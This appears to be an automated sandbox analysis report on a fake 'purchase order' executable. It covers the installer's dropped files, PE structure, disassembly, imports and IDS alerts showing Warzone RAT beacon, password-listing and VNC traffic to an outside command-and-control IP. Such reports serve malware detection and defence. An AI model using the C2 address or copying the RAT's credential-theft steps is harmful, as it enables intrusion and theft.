                                                      Preview:........!.+..5............+......T.7..4....$.........c........#.................S...............H...'................w.t...<..M.n...Rc...C..r.n.HW.......x...............`.^......".Z......Y......uM......................................C.......w..T....\.\.........0.]..........8...n...=...Zr..R..........).L.....z.......a..K.....(..9)....}.....S.eg.............. ...............................R.:..................(......V...[&a...j......tpj.....j..,d.u..n....p.....E.......J\...d.......'..a.....9..e........r.+...k........'........zb.<.....:..........l..i*...............Q]...u..........*]....N...........A............-......e.......q..P.....IE..X......&.d{........|............4......<...;.6...V\.......<d.........-..............3q......O{.24.....t..'.E......w........m.@........>..........5.../J....U..q.[............{.......#...LT.}...BC../....:......E....8......u.. U..l.h.....I..............9..6............e.b.......y..o...O......\........uZLW........+. ...z..|.iA.@..:r..]..=
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:ASCII text, with very long lines (319), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):319
                                                      Entropy (8bit):4.198098821912791
                                                      Encrypted:false
                                                      SSDEEP:6:9gaVxPQMn7JVKbLnnVc/gvcLhen0BA/xVr8AJC0FKLY2oE:9f+Mn7JVKvn+/g0Nen0BA/9woZ2oE
                                                      MD5:87544BC223E904AB99D2FB09BAA0A9ED
                                                      SHA1:8EEF763921C6C4B95E0D6CC936D6F4A209EC432C
                                                      SHA-256:6364ECBAAC539616E2599E9DADAF28799F0A3CFF938CD192C583A60AA5CE75EC
                                                      SHA-512:C6434958143E38ACF66FCF24A3853B1FE1C6A68A38A2F56CD908BCED275D801071827B293F27F19DE9819AEB55B55293887BEE9C74C349BA9DF1069CD87FCB14
                                                      Malicious:false
                                                      Preview:reserate pat paafulgtes rist fortegnsvariationernes betastraalingen dyslexias.atoning indretningernes bambusroer hedgier reinvokes opnaaede.contrib paddymelon preendeavor,spareren eyepoints subtraherings.undiminishably ljede protohuman blusernes kronraget unaiming.gederamses diskvalificeringernes outbaking plukfisken.
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3990
                                                      Entropy (8bit):4.915839579610154
                                                      Encrypted:false
                                                      SSDEEP:96:68a9g92fuDw0ogaoj0fZHi6WOs9ZmIzvXJypXLXBmKyZ:68a9O2mDw52j0fxitTmIdypVmlZ
                                                      MD5:9461284D0829E82BED36A7D8EED020E2
                                                      SHA1:F60E0216CFF9EE7255851D6330243B79AF000643
                                                      SHA-256:5A0E8A35D550982F9C646FE48C810CD7B9AF929AE73A56282ECABF9F48039392
                                                      SHA-512:8B5A60AB5B822EC7E8DBF4F4884014FFA6F4C44A38CD631766C9489924288C2483FE38AAB0EC8D5EED57C7A21067EEED51E74DA03299176C39DC84323611EB5C
                                                      Malicious:false
                                                      Preview:.....OP............i.8...1..IC.........^............3\:..|..{L......@............t..T.k....A.. .....w...p..V..8.....................`......... ......2....I.....Z......=4...1.!................a...........d....3.......U$......l....."...................,.{Q...~........X...p:..6....=........J.............^......mfd...............~..............b........................g..Q...........<!....i.....L.....j....Bd..b.....s............................>o......>......_...m..E.....%..j....|...z.F.Wp:.CB..N..e.,.....l.......|Aj.....R...2F.._.......s.5..>V...w..................J.....a@..;...w....$.....,D....+..........6.. ....P.....................Kl.b...;.......U....3.{`...PP.........kC...^....+..t.z........+...~C.#.......Ls........B.......%9..}...........N..D......................j.f....r...E$................+..6.U...W.....m2.:.....]e..Gc.E..)...:}...y....................hX...y........a............8.........S.. .......PL..E......%.U...........;.......L.V.Cw........W....j.........Z..=.....
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2761
                                                      Entropy (8bit):4.852423953932994
                                                      Encrypted:false
                                                      SSDEEP:48:uRY0zVh5JKHU53ZzetTl+x750NvO3YVhFJjUDwqQsI3FhOl5:6Y0zP5JsUVZzeJlK50lrwxnAFi
                                                      MD5:05731B095B6D0F70966F4C9E801058E4
                                                      SHA1:D653EB7E55528F78D421A532DD2A2A2FA81005B6
                                                      SHA-256:D6948E6E0EB4D1080FFA9E0B178399B5FD1D0D5B94F7F0B2ECC5DF0103FE74FE
                                                      SHA-512:349D9482C5B627FAB0B11E86100C8BCA4D4400F2DBE860C5584107268BEE6DD946A5A2E5B41ACF59CBE8D1D20F29B1CD6B62B57AAEF248BD864230955DD6D993
                                                      Malicious:false
                                                      Preview:.S............-n.Z.r.Jb............d.......N..i....1.h).. .......`i.n...,a...b.:... ....|.....e......._}....B.......J.............a.........t#.....u...N{.^...^..~...t...u..:...........!c.........w.........B...R.........e..f........q.."..>..6'...N.GJ.$.....[.K.9..l....{.......L.............TG].......%...............<.h............ .N.r.........Ef..............WL....:........N..........C.......w......c...............@p.........z.....[..0.............................o................T...4qO............a<.q.i.....l..n.....L....y.1............^.^....{....L....................^.E.......=......L.>..J"+om.......k.......F...,......e...@...{.........N.....B........w.H.D...G.]*.....2................Q..v...S.q.......{..(.......0.....T....T....P.....ZCz.%&.k.)...R..._...p.EO..W.7rF.....<..._..=..%.............9.....@Iz....4.LW.I..3@.\.............>..O...............q....[:...G...i..Ye........,....................l.F...../.......sd.......=..>..X.........g..PV.....t.....7......$.N......Pa...
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):4709
                                                      Entropy (8bit):5.044394927756418
                                                      Encrypted:false
                                                      SSDEEP:96:UbBc1Kxn2RFNeIlrLrLl+B3SEUyDx3iFywexkohSim1oM1t:UbWKx2RTlrLrLnEUixSF+xkoYroM1t
                                                      MD5:B2BFCEEAE4A13729B3C428164BF1799B
                                                      SHA1:73BED4438FDE2FE56C4EFC2C29A9C76727C5405D
                                                      SHA-256:A098F92A6F60D931F569F3EECA0FE65014188D57B31B9BA0D5EE64FD6691813F
                                                      SHA-512:38F26E56A8FA5C0E361121EB3707224C81CD5C9F598737C7E7D006D8E55A178F77C5536F6867EFAA56ACB2470041BB49CC1D3F54C02B3E177413EA45ED251CDE
                                                      Malicious:false
                                                      Preview:..z....E.j../......~.0.P..............u.............G..........c.......A.7...............n.........o......X....;..7...[....\..m...:....H..T.........U.E.*....{...`Z...fm......6.....:..N.......>a.....{...............d0.B.....X.3%G........t..............w..........0................Q..G...L...P..............l.....H......Y.......:.|.....E.....gZ..x.... .......'...0...........#.c..........z..........q................,.!.................c...H.......a..I...........v...<...s~.?.r..^.....Da......\......9V..PK..!.....o......<...........UB.7.......PG.........!..B......i.5...............e.......?8...Db,...Q...................l....P|.......;...=s.....0....r..0...^..D<.^..l....0.........#.....5U....h..................V...{..O...........1W......q...A....Y..s.......D......./.8......../.m....c..........................K........m1....R.........x............9.....a...`...f...x..d.....C........&.1aO..S.....O.................C...a1..P..................c.20.......lQ.U....M d.......=....
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3838
                                                      Entropy (8bit):4.888332960607232
                                                      Encrypted:false
                                                      SSDEEP:96:l4UHp6AXm7A5xvlRyRDUuK8SKp4Fw1QNH8BAE9nJJZ4n:KUHp6AXm7AjvlwlXK8SO4iou/8n
                                                      MD5:66EF19C1FA2DE16A468A9A21C70D9BA6
                                                      SHA1:165C53489E23941DC9C07F67A1294B29E26377A1
                                                      SHA-256:15B2C916AAE9DD349D8886B9EDD85076491C41F837FDB09812FC645342405034
                                                      SHA-512:20497E2679243F874220635B9E6A06AF2E4901AFC16F7922F464F43158A12B0E03C540DB32023FFD2A8AFFF8446AD86F32E37C9C4AFD593D7A78B2AD668C689C
                                                      Malicious:false
                                                      Preview:.(.3...z..Q.....*...hs..H.........n.6..w.....2:.'.J.9.T..........z!.....9...........!b..........u.}0R._zI......\................8....]..............}..............z..=..'..Z...p...*..e#.........&.5....M.............%........J...G.m..2............................|.!$T....C..k`..o....V............e...G.R...............V..A.....p&.a../v..C.....`... ...F......4.g...........N...F.....,.3.b.v.........u.R@....4e..||).d....a.B........q.....D........4...................c.S......Z......B[.d....A.l.w..4...:.7D...........Z..................y..Q..............C.Q..AQ.CX.........@.N....,...1?GE....E.................,.....g..3..F.................b=...4..A...:....v....J.......a........v........Qr........WOY...........v...................i.....h.......\................ .G..?..)..C........... ...W.......a{..e...G...v...,.........l....^..[......q..!....W....................^......B...............................%.........................V..,........^v......Z....D.....'..........YN.......N
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2267
                                                      Entropy (8bit):4.966904809667199
                                                      Encrypted:false
                                                      SSDEEP:48:/G85VJc45J6wemJXPvF8sT0CM/oUXGPsK6UHD5SrfcrU+bWlFmXB:/rV9UIeCM/oEGPsK6UHgcIrCB
                                                      MD5:F5A95DABE2399668545C575BD6131C61
                                                      SHA1:8B52AB9F20296BB65CE5067F5AAF974D7728507E
                                                      SHA-256:57749A12F13BFF6D3800540FB910288EAE7CCD0A1DA515C4B1CCFB0DCDD3D66E
                                                      SHA-512:03593A079AC3C5F50217630ACB6AB83EF858CDB0406D9AC5AE9E0F210FC23661D3A6B55AA3352F1FC782FFBEFD3E0D567BE7A949D7ADB9ADB7D627C08FDFB1F6
                                                      Malicious:false
                                                      Preview:.KIL.....).......T.........i.....q.....!z....X./..:..+..z."..f...D.....i.6..............\.....L.....~"...Y....k......z.._.a..........o........x=.....K........n.0W>....d.W.DvV.........lI.......I.N...................m...P..?....)......e..Y...........}......0....O.....~:.......4...O^...%..tD......;(..~....9x..H.w...............5.W..W.........!......l..;...:......./....6.......M.........H^....e..."'.@..6{........o..B.,.......@.......................*.............y.-..Z..Q..T....U.....cx..x...................`...zw....@.D.Zi..S...B..............&.....'............S.....OK........l..U.l...........L...H...,.....?...............b.................Z................................6x...D...B....}.....#S....d.p..r....l..E........'.....).......N......4.}.h.......y.R....[e....;4t.......Dc.E........%H.....................y...w..:.|....6...)tf.........V..2....n...........}......Y.Xx..uA.....N.................-... ..............i.....;I!.......$h.........J......x.,oY.....)..0.EJ..........>.0
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                      Category:dropped
                                                      Size (bytes):40960
                                                      Entropy (8bit):0.8553638852307782
                                                      Encrypted:false
                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                      Category:dropped
                                                      Size (bytes):51200
                                                      Entropy (8bit):0.8746135976761988
                                                      Encrypted:false
                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):601509
                                                      Entropy (8bit):6.009032047307258
                                                      Encrypted:false
                                                      SSDEEP:12288:v/zUE3ETdHB+LeuC6MeAOXw6VwIHDIu62IPXjHV:X6RHw1C6MqgIDjyPT1
                                                      MD5:42C2EBC54581AC47FB5D8F01902DCEBF
                                                      SHA1:706A4A789DEB72F11BD47B29417D06B083BD302F
                                                      SHA-256:AF5EEFB41935639C5D8FCD3D6DA834832B62A44A93E856898C2664C6B7F78735
                                                      SHA-512:8E391DE3E857F9E448E5A4478AC170C7CEB9E1D9B5904BF9B0491D68BFA3076EB1315159F94ED3D85A4895DC71D14C7774073B602C18AE0EF833A9876E199913
                                                      Malicious:false
                                                      Preview:{"browser":{"first_run_finished":true,"shortcut_migration_version":"117.0.5938.149"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.696499469977869e+12,"network":1.69649947e+12,"ticks":950784969.0,"uncertainty":2115320.0}},"os_crypt":{"app_bound_fixed_data":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAG7I4XamucEiJgTIvWNrX8QAAAAACAAAAAAAQZgAAAAEAACAAAAD/i5iZthvbAMtQI7LwVpFb6jmIRlnZBn3BOL+GZt4kogAAAAAOgAAAAAIAACAAAABrT9mzRTsNQCdkuszmZKjpexNj6pJ09kyX6bwi+21l8WABAAC2oOGGveU6vtEtyQAIMBMXo7f864ZX39/zY32wXs2ycQ6SoKTjYg7Br2GFeNLLP279dGg8Zuzkl8PZaQtQPJ+wYAAvzw/sRMCe0iF3uJ7Kw9zB62X16c4T+scYcq9Dmqv88jZ9QpusCOnz2QdwDmnuAjYAEFaWbKP7uQ+SnzdDWQHVXD1+dwbZpQWa8x21LgEmlB/JwHBUlXnGTlbJNM/86NOp0VESKNzRg9tYvr0QOVTugQn/8kgsBWz2hnKxt6/JKyLjCqmGrrVwBIqp4h98HPLgssce9hMqhqambQ6wEZM9vPGGQNfobT/qUkNaQU6RWKKKvKUTpYhs1Bsu5t24JQ6PZ4
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):41554
                                                      Entropy (8bit):6.092063318051665
                                                      Encrypted:false
                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kozUXqgfbRFXUqNNJ8vQYqGwLWZkHUfG6kCvoc:z/Ps+wsI7yndsDqfyW0e6kaoc
                                                      MD5:51103BDEC12BF3AB1D77859A5428CB8F
                                                      SHA1:9CDEA877EC32997269EEA396BF5453D7E7BB6D08
                                                      SHA-256:1360FD6D8A494282867F0F78B89359F675DF5897C596AF9A735B5B3985E26A98
                                                      SHA-512:D023812335ADA1F689580D4E6E02E9B9C888B86E3B6C2B73B8DA91D0824F69AEFEF1E7913186D0ADC4ED6AD029C3E67BE41CADFA25E551460F1C2FA3F45C3B9F
                                                      Malicious:false
                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.388463159439505
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:PO2737478834ORDER.exe
                                                      File size:467'152 bytes
                                                      MD5:6d84fe81c98c02205cc129f68aca4529
                                                      SHA1:cf805bfa98d12c72a2f355cf1743de9ca7b8d12c
                                                      SHA256:987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be
                                                      SHA512:cae0bb8a0297d54f5f9db2c7361f5fba9e8032e2bad91573ff9d83af3d87c86a483aff4afb0621cfc9dd744612bcdadf3ae315ed031c77adc342d0b447310009
                                                      SSDEEP:6144:9qjI9UE2ypwdlL93DrhArk3l2fd55p5uhI5o8NUN6SYUiIdCcFSaKImLxUIohqy:UM2yKjL1mrnJpu0c6SDUH9UIohqy
                                                      TLSH:29A4021523D7C436F5A208B049B6D14EB6F4EE4430AF96677B2B761EB73C6C26C0E14A
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...g..`.................b...........3............@
                                                      Icon Hash:0a73617511034307
                                                      Entrypoint:0x403312
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x60FC9167 [Sat Jul 24 22:17:11 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:ced282d9b261d1462772017fe2f6972b
                                                      Signature Valid:false
                                                      Signature Issuer:E=Spottedness241@Zaddick.Mn, O=Delicacy, OU="Solania Aktiebeholdningen ", CN=Delicacy, L=Hatten, S=Niedersachsen, C=DE
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 03/12/2023 02:47:55 02/12/2026 02:47:55
                                                      Subject Chain
                                                      • E=Spottedness241@Zaddick.Mn, O=Delicacy, OU="Solania Aktiebeholdningen ", CN=Delicacy, L=Hatten, S=Niedersachsen, C=DE
                                                      Version:3
                                                      Thumbprint MD5:61104ED6A7B21ED2779606E2FC04E778
                                                      Thumbprint SHA-1:3639937A0195B2DEAA57CAE3C1F62D390046A686
                                                      Thumbprint SHA-256:3D500C813DC017202B4A3D4EAADA653CF61B956325DA4053E2CBDE5FE7683F71
                                                      Serial:258EE619798E33676E8B6D6DDFA7523E869CC611
                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+18h], ebx
                                                      mov dword ptr [esp+10h], 0040A198h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov byte ptr [esp+14h], 00000020h
                                                      call dword ptr [004080B8h]
                                                      call dword ptr [004080BCh]
                                                      and eax, BFFFFFFFh
                                                      cmp ax, 00000006h
                                                      mov dword ptr [0042472Ch], eax
                                                      je 00007F498968BD93h
                                                      push ebx
                                                      call 00007F498968EEF6h
                                                      cmp eax, ebx
                                                      je 00007F498968BD89h
                                                      push 00000C00h
                                                      call eax
                                                      mov esi, 004082A0h
                                                      push esi
                                                      call 00007F498968EE72h
                                                      push esi
                                                      call dword ptr [004080CCh]
                                                      lea esi, dword ptr [esi+eax+01h]
                                                      cmp byte ptr [esi], bl
                                                      jne 00007F498968BD6Dh
                                                      push 0000000Bh
                                                      call 00007F498968EECAh
                                                      push 00000009h
                                                      call 00007F498968EEC3h
                                                      push 00000007h
                                                      mov dword ptr [00424724h], eax
                                                      call 00007F498968EEB7h
                                                      cmp eax, ebx
                                                      je 00007F498968BD91h
                                                      push 0000001Eh
                                                      call eax
                                                      test eax, eax
                                                      je 00007F498968BD89h
                                                      or byte ptr [0042472Fh], 00000040h
                                                      push ebp
                                                      call dword ptr [00408038h]
                                                      push ebx
                                                      call dword ptr [00408288h]
                                                      mov dword ptr [004247F8h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0041FCE8h
                                                      call dword ptr [0040816Ch]
                                                      push 0040A188h
                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x350000x19540.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x716a80xa28
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x60d50x620083acff9b8bf5b52f9975f8acdcabf744False0.6630660076530612data6.4176717642026535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x80000x12740x1400b8e42f3d3b81b0e2a4080ab31bc2d1f4False0.4337890625data5.061067348371254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xa0000x1a8380x600599a2f85a30bf72bff5e1c2e854c43eeFalse0.4361979166666667data3.9951628803851107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .ndata0x250000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x350000x195400x196000593e2238cbeae97fff86ab929026925False0.30146436268472904data3.9814539129579356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x352f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.13402046610670768
                                                      RT_ICON0x45b200x3cfbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9709819998718852
                                                      RT_ICON0x498200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.2483402489626556
                                                      RT_ICON0x4bdc80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2903377110694184
                                                      RT_ICON0x4ce700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.36721311475409835
                                                      RT_ICON0x4d7f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4530141843971631
                                                      RT_DIALOG0x4dc600x100dataEnglishUnited States0.5234375
                                                      RT_DIALOG0x4dd600xf8dataEnglishUnited States0.6370967741935484
                                                      RT_DIALOG0x4de580xa0dataEnglishUnited States0.6125
                                                      RT_DIALOG0x4def80x60dataEnglishUnited States0.7291666666666666
                                                      RT_GROUP_ICON0x4df580x5adataEnglishUnited States0.7888888888888889
                                                      RT_VERSION0x4dfb80x244dataEnglishUnited States0.5362068965517242
                                                      RT_MANIFEST0x4e2000x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                      DLLImport
                                                      ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                      SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                      ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                      USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States
                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      05/22/24-20:08:53.293761TCP2852347ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse5637278192.168.2.1031.192.107.180
                                                      05/22/24-20:08:53.598499TCP2852350ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand785637231.192.107.180192.168.2.10
                                                      05/22/24-20:08:53.874038TCP2852354ETPRO TROJAN Ave Maria/Warzone RAT RemoteModuleLoadResponse785637231.192.107.180192.168.2.10
                                                      05/22/24-20:08:53.600199TCP2852355ETPRO TROJAN Ave Maria/Warzone RAT VNCGetModule5637278192.168.2.1031.192.107.180
